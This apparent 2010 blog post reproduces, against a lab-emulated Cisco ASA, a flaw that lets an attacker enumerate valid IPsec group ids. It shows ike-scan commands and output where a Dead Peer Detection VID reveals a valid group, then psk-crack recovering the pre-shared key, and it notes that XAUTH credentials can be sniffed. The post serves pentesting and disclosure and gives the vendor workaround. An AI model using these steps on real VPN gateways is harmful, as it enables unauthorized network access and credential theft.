Wednesday, December 22, 2010

How hard could it be to brute force a Cisco IPsec VPN group id?

Apparently not as hard as you would think, due to a recently updated security advisory. The group id is used in Cisco IPsec VPN to distinguish a set of users that use common connection parameters and client attributes. Back in 2005 NTA Monitor discovered that a vulnerable Cisco IPsec implementation would reply to the IKE negotiation if the group name in the IKE message was valid, whereas an invalid group name would result in no response.

The new variant discovered by Gavin Jones of NGS Secure depends on the difference in response for the dead peer detection VID. Dead peer detection or DPD could be seen as a polling mechanism to see if the other IKE peer is still alive. I was wondering how difficult it would be to reproduce given the fact nobody else noticed it for 5 years or cared enough to inform Cisco about it. Since Cisco ASA is the only vulnerable product this would be the most interesting type of device to test, but since I don't have a physical device to test I used an emulated VMWare version provided by the ASA project. The vulnerability is only present when the ASA is used as a remote access VPN and I used this guide with Cisco ASDM to configure it. I could only use DES instead of 3DES or AES encryption, because you need a separate license for it and the virtual ASA simple crashes when you try to add one.


Once configured whe can use ike-scan to probe and test the device. I won't point you to the NTA monitor site, as it is currently reported as malicious website by Google, so be carefull. However if we use ike-scan to probe the ASA using IPsec aggressive mode without a group id using the following command we get no response:


# ike-scan -M -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.437 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify



If we specify a random group id we receive the following response:


# ike-scan -M --id=foobar -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.173.50    Aggressive Mode Handshake returned
    HDR=(CKY-R=0fb137a8ae462a21)
    SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(20 bytes)
    ID(Type=ID_IPV4_ADDR, Value=192.168.173.50)
    Hash(20 bytes)
    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
    VID=09002689dfd6b712 (XAUTH)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
    VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)


If we guess the correct group id we will receive the following response:

# ike-scan -M --id=secret -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.173.50    Aggressive Mode Handshake returned
    HDR=(CKY-R=c27436032ea1c5fd)
    SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(20 bytes)
    ID(Type=ID_IPV4_ADDR, Value=192.168.173.50)
    Hash(20 bytes)
    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
    VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)


The DPD option that is added to the received response will allow us to distinguish between a valid and invalid group id. The PDP VID valua is static and does not change between requests with a valid group id. I was quite surprised that it was this simple. Once we know the valid group id we could save the pre-shared key with the --pskcrack option of ike-scan and use psk-crack consequently to perform a dictionary or brute force attack:


$ psk-crack testkey
Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "cisco" matches SHA1 hash a0520306d83e6c642be92f9684c10dfcc409fede
Ending psk-crack: 70752 iterations in 0.194 seconds (364486.85 iterations/sec)



Now that we have the key does that mean the we have VPN access to the network? Unfortunately this is not the case, because commonly the IPsec gateway requests extended authentication through IPsec XAUTH. What we could do however is eavesdrop on another user connecting via IPsec and gain access to the XAUTH authentication credentials, as these are in clear text once we decrypt the IPsec network traffic wih the pre-shared secret we just cracked. Not very likely in a pentesting scenario, but maybe you are lucky and no XAUTH is used on the device you are pentesting.


ike-scan is not the best tool to perform a brute force of the group id in a convenient way, so luckily Francois Ropert recently submitted a Metasploit module to perform the brute force. Currently the module has not yet been added to trunk yet. According the Cisco security response the vulnerability will be fixed in February 2011. It is advised to disable IPsec aggressive mode as a workaround for this vulnerability.

No comments:

Post a Comment